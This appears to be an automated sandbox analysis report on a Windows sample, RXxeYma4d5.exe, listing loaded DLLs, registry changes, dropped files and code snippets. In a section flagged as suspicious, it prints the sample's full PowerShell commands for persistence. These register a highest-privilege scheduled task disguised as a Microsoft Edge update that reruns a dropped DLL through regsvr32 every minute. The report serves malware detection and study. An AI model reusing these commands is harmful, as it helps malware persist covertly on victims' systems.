Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: dinput8.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp

Window found: window name: TMainForm

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\File Manager_is1

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{8208A45D-F29A-4A60-CBD5-99028FB966B8}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll' }) { exit 0 } else { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{8208A45D-F29A-4A60-CBD5-99028FB966B8}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E48A70 LoadLibraryW,GetProcAddress,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,

5_2_02E48A70

Source: _setup64.tmp.1.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: is-I9R0P.tmp.3.dr	Static PE information: real checksum: 0xc4d5e should be: 0xcc413
Source: _setup64.tmp.3.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: is-HU557.tmp.3.dr	Static PE information: real checksum: 0x0 should be: 0x1320bf
Source: RXxeYma4d5.exe	Static PE information: real checksum: 0x0 should be: 0xefeac
Source: RXxeYma4d5.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x12d741
Source: RXxeYma4d5.tmp.2.dr	Static PE information: real checksum: 0x0 should be: 0x12d741

Source: is-I9R0P.tmp.3.dr

Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp

Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll

Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E400B7 push rdi; ret	5_2_02E400BD
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02E6F949 push rbp; retf	5_2_02E6F974
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_0287B348 push esp; iretd	5_2_0287B349
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02885DBA push ebp; iretd	5_2_02885DC4
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028BBA55 push esp; iretd	5_2_028BBA56
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_028C64C7 push ebp; iretd	5_2_028C64D1
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D8F787 push cs; retf	5_2_02D8F788
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D90449 pushfd ; ret	5_2_02D9044A
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D7847D push eax; ret	5_2_02D7847E
Source: C:\Windows\System32\regsvr32.exe	Code function: 5_2_02D78428 push ecx; ret	5_2_02D78429
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9B50D2A5 pushad ; iretd	6_2_00007FFD9B50D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9B6278B5 push ebx; retf	6_2_00007FFD9B62796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9B622098 push E95E6CD2h; ret	6_2_00007FFD9B6220E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9B6278FC push ebx; retf	6_2_00007FFD9B62796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B4ED2A5 pushad ; iretd	8_2_00007FFD9B4ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B60DBCB push E85B2FB6h; ret	8_2_00007FFD9B60DBF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B60DB8D push E85B2FB6h; ret	8_2_00007FFD9B60DBF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B60AFFA push eax; ret	8_2_00007FFD9B60B051
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B6000BD pushad ; iretd	8_2_00007FFD9B6000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9B6D6DCB push ecx; iretd	8_2_00007FFD9B6D6DCC

Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	File created: C:\Users\user\AppData\Local\Temp\is-I3JO9.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	File created: C:\Users\user\AppData\Roaming\Setup_Cow.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	File created: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	File created: C:\Users\user\AppData\Roaming\is-I9R0P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	File created: C:\Users\user\AppData\Local\Temp\is-I54BB.tmp\_isetup\_shfoldr.dll	Jump to dropped file
